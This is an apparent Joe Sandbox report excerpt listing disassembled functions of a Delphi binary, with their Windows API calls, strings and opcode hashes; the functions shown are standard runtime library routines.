                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoLocale
                                                                                        • String ID:
                                                                                        • API String ID: 2299586839-0
                                                                                        • Opcode ID: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
                                                                                        • Instruction ID: c396314a23b4a9f96df9c766c0add5aa8b6bf1be128c16d8482352ee59576f6f
                                                                                        • Opcode Fuzzy Hash: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
                                                                                        • Instruction Fuzzy Hash: 3CE0D87270022417D312A558EC89EF6737DA758310F0042BABD06D7385EEF09E804AE8
                                                                                        Function 027DB78C Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetVersionExA.KERNEL32(?,027FD106,00000000,027FD11E), ref: 027DB79A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: Version
                                                                                        • String ID:
                                                                                        • API String ID: 1889659487-0
                                                                                        • Opcode ID: 2df821fe1c0b2850e5714d7c8dba99aec719e861e336eb83a962f5c2fed5e111
                                                                                        • Instruction ID: 7b320200a1fdac533799529f07e56679c52cc05a5f38b44a45ad8ac79cff815a
                                                                                        • Opcode Fuzzy Hash: 2df821fe1c0b2850e5714d7c8dba99aec719e861e336eb83a962f5c2fed5e111
                                                                                        • Instruction Fuzzy Hash: DDF0AF789483039FD390DF29D441A16B7EAFB48724F418D29EA9887390E734A894CF62
                                                                                        Function 027DA810 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,027DBE72,00000000,027DC08B,?,?,00000000,00000000), ref: 027DA823
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoLocale
                                                                                        • String ID:
                                                                                        • API String ID: 2299586839-0
                                                                                        • Opcode ID: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
                                                                                        • Instruction ID: 829dde694dd0b27bb793fb25bea6cf45d41caef0f97037f34a2e13389430dd66
                                                                                        • Opcode Fuzzy Hash: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
                                                                                        • Instruction Fuzzy Hash: C5D05EA674E2602AA311915A2D85D7B9AFCDAC57A1F00407AFD88C7101D3008C07DAB1
                                                                                        Function 027D920C Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: LocalTime
                                                                                        • String ID:
                                                                                        • API String ID: 481472006-0
                                                                                        • Opcode ID: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
                                                                                        • Instruction ID: f75122e12ea53b13a10ae4fb423491a24eb2dca2e27d63284c27b05072b011ba
                                                                                        • Opcode Fuzzy Hash: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
                                                                                        • Instruction Fuzzy Hash: 3DA0124440482041854033181C0263430649810A20FC4878068F8402D0E91D01208093
                                                                                        Function 027D20C4 Relevance: .1, Instructions: 94COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                        • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                                        • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                        • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                                        Function 027DD294 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 027DD29D
                                                                                          • Part of subcall function 027DD268: GetProcAddress.KERNEL32(00000000), ref: 027DD281
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                        • API String ID: 1646373207-1918263038
                                                                                        • Opcode ID: a14e6d1fce776ea0c8140a400593bde20454c2423af50513e836a1aaec06f4d6
                                                                                        • Instruction ID: 70082f25d28e397680997710b4296ada3d3d00ab7a2de472876329938869d6bb
                                                                                        • Opcode Fuzzy Hash: a14e6d1fce776ea0c8140a400593bde20454c2423af50513e836a1aaec06f4d6
                                                                                        • Instruction Fuzzy Hash: F241ABB7A893085B56366BBD740462BB7FED644B143A3863AF404CB784DE30FC55CA29
                                                                                        Function 027E6ED8 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(ole32.dll), ref: 027E6EDE
                                                                                        • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 027E6EEF
                                                                                        • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 027E6EFF
                                                                                        • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 027E6F0F
                                                                                        • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 027E6F1F
                                                                                        • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 027E6F2F
                                                                                        • GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 027E6F3F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$HandleModule
                                                                                        • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                                        • API String ID: 667068680-2233174745
                                                                                        • Opcode ID: bb1ab7cc17eea2f7dece04f9b20df101042e005921d67c2445baeaf65b8a7f85
                                                                                        • Instruction ID: 5f6582be247d842eeb57bc76840c464108304e83433aa26b8a28331dd437f19b
                                                                                        • Opcode Fuzzy Hash: bb1ab7cc17eea2f7dece04f9b20df101042e005921d67c2445baeaf65b8a7f85
                                                                                        • Instruction Fuzzy Hash: FAF04CE4A8C380BEBE41BB746C85C363F6DE539A043005C96BA4355552F77598148F76
                                                                                        Function 027D2530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 027D28CE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message
                                                                                        • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                        • API String ID: 2030045667-32948583
                                                                                        • Opcode ID: 89c3fb16abc998b7cc9a6af137fb7ce23d7140d6eddcba614584460fc8a2682b
                                                                                        • Instruction ID: 37ccfbb4b12e3cc2aae05fecf055aca71778cf63c419eb97f48cacf89b4f00ba
                                                                                        • Opcode Fuzzy Hash: 89c3fb16abc998b7cc9a6af137fb7ce23d7140d6eddcba614584460fc8a2682b
                                                                                        • Instruction Fuzzy Hash: 6EA1D430A042648FDB22AA2CCC84B99BAF5EB09350F1441F5DD49AB287CB7589C7CF51
                                                                                        Function 027D252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • The sizes of unexpected leaked medium and large blocks are: , xrefs: 027D2849
                                                                                        • An unexpected memory leak has occurred. , xrefs: 027D2690
                                                                                        • bytes: , xrefs: 027D275D
                                                                                        • 7, xrefs: 027D26A1
                                                                                        • Unexpected Memory Leak, xrefs: 027D28C0
                                                                                        • , xrefs: 027D2814
                                                                                        • The unexpected small block leaks are:, xrefs: 027D2707
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                        • API String ID: 0-2723507874
                                                                                        • Opcode ID: 604229bb671283c532758d19730ceab8b16d461e07898c1665cc70336f383952
                                                                                        • Instruction ID: 088807f612704a6f3a62dbdc8f4d924b73046c39931cc7bf99b782c2e2d59798
                                                                                        • Opcode Fuzzy Hash: 604229bb671283c532758d19730ceab8b16d461e07898c1665cc70336f383952
                                                                                        • Instruction Fuzzy Hash: E771C430A042688FDB229A2CCC84BD9BAF5EB09714F5441E5D949EB283DB7549C7CF51
                                                                                        Function 027DBDC0 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetThreadLocale.KERNEL32(00000000,027DC08B,?,?,00000000,00000000), ref: 027DBDF6
                                                                                          • Part of subcall function 027DA7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 027DA7E2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: Locale$InfoThread
                                                                                        • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                        • API String ID: 4232894706-2493093252
                                                                                        • Opcode ID: 9fec6a6024d47c481c217b8d4bce9920b6805c141a9ae71808601244ba0374c0
                                                                                        • Instruction ID: 88f842d5298c3c1cc6d1f45ab7f941d6e89d60cc143101da875deb86fb00df64
                                                                                        • Opcode Fuzzy Hash: 9fec6a6024d47c481c217b8d4bce9920b6805c141a9ae71808601244ba0374c0
                                                                                        • Instruction Fuzzy Hash: 19614234B001589BDB06EBA4DC54A9FB7B7EF88300F519839E101EB645DA39D94ACBA1
                                                                                        Function 027EAE98 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 102COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • IsBadReadPtr.KERNEL32(?,00000004), ref: 027EAEB8
                                                                                        • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 027EAECF
                                                                                        • IsBadReadPtr.KERNEL32(?,00000004), ref: 027EAF63
                                                                                        • IsBadReadPtr.KERNEL32(?,00000002), ref: 027EAF6F
                                                                                        • IsBadReadPtr.KERNEL32(?,00000014), ref: 027EAF83
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: Read$HandleModule
                                                                                        • String ID: KernelBase$LoadLibraryExA
                                                                                        • API String ID: 2226866862-113032527
                                                                                        • Opcode ID: 06c620b85456ec196bcb8c87b19b52a1e104e13b66f590e99ba4a26b7e74322e
                                                                                        • Instruction ID: f5512ac820a2f2d4f168ef4a3e9ae1f1230271d894c348c1ea741b6d64146020
                                                                                        • Opcode Fuzzy Hash: 06c620b85456ec196bcb8c87b19b52a1e104e13b66f590e99ba4a26b7e74322e
                                                                                        • Instruction Fuzzy Hash: C8314FB6A40305BBDF21DB68CC85F5A77A8AF09728F044154FA16AB2C1D370E950CBB2
                                                                                        Function 027D435C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,027D4423,?,?,0282A7C8,?,?,027FE7A8,027D65B1,027FD30D), ref: 027D4395
                                                                                        • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,027D4423,?,?,0282A7C8,?,?,027FE7A8,027D65B1,027FD30D), ref: 027D439B
                                                                                        • GetStdHandle.KERNEL32(000000F5,027D43E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,027D4423,?,?,0282A7C8), ref: 027D43B0
                                                                                        • WriteFile.KERNEL32(00000000,000000F5,027D43E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,027D4423,?,?), ref: 027D43B6
                                                                                        • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 027D43D4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileHandleWrite$Message
                                                                                        • String ID: Error$Runtime error at 00000000
                                                                                        • API String ID: 1570097196-2970929446
                                                                                        • Opcode ID: b796623d49067b6c77172796d35e003ec3a320245d8e81b72a2d8cb60b48c800
                                                                                        • Instruction ID: ff6cf0c2e71c4ba2a26a0b189fab061016cc5625eceeaf450458219761258286
                                                                                        • Opcode Fuzzy Hash: b796623d49067b6c77172796d35e003ec3a320245d8e81b72a2d8cb60b48c800
                                                                                        • Instruction Fuzzy Hash: F4F0B4A9AC8341BBFF21A2A4EC5AF592B7D8744F21F508A05B324B40D187F448C89B36
                                                                                        Function 027DAEC4 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 027DAD3C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 027DAD59
                                                                                          • Part of subcall function 027DAD3C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 027DAD7D
                                                                                          • Part of subcall function 027DAD3C: GetModuleFileNameA.KERNEL32(027D0000,?,00000105), ref: 027DAD98
                                                                                          • Part of subcall function 027DAD3C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 027DAE2E
                                                                                        • CharToOemA.USER32(?,?), ref: 027DAEFB
                                                                                        • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 027DAF18
                                                                                        • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 027DAF1E
                                                                                        • GetStdHandle.KERNEL32(000000F4,027DAF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 027DAF33
                                                                                        • WriteFile.KERNEL32(00000000,000000F4,027DAF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 027DAF39
                                                                                        • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 027DAF5B
                                                                                        • MessageBoxA.USER32(00000000,?,?,00002010), ref: 027DAF71
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 185507032-0
                                                                                        • Opcode ID: d9aa5f5f1175ec19bed18aa54b61592d3b763fcdb74dc7a6cd5eb4a79d7efde0
                                                                                        • Instruction ID: 743cbbdacb28089415e977d9d5b26c4270a8bb78df94852e1c2ca67e19fc21bf
                                                                                        • Opcode Fuzzy Hash: d9aa5f5f1175ec19bed18aa54b61592d3b763fcdb74dc7a6cd5eb4a79d7efde0
                                                                                        • Instruction Fuzzy Hash: DD11CEB6544304BED302FBA4DC89F9B77FDAB45310F804A56B754D60E1DB71E9048B62
                                                                                        Function 027DE58C Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 027DE625
                                                                                        • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 027DE641
                                                                                        • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 027DE67A
                                                                                        • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 027DE6F7
                                                                                        • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 027DE710
                                                                                        • VariantCopy.OLEAUT32(?,00000000), ref: 027DE745
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                        • String ID:
                                                                                        • API String ID: 351091851-0
                                                                                        • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                        • Instruction ID: 7bd527e0e0c8703d91f91903a2e2ea69a9bb1dd586759c9b0cc75b2ffb61a889
                                                                                        • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                        • Instruction Fuzzy Hash: 5251087690162D9BCB23DF58CD84BDAB3BDAF49340F4041D5EA09EB211DA30AF858F61
                                                                                        Function 027D3598 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 027D35BA
                                                                                        • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,027D3609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 027D35ED
                                                                                        • RegCloseKey.ADVAPI32(?,027D3610,00000000,?,00000004,00000000,027D3609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 027D3603
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
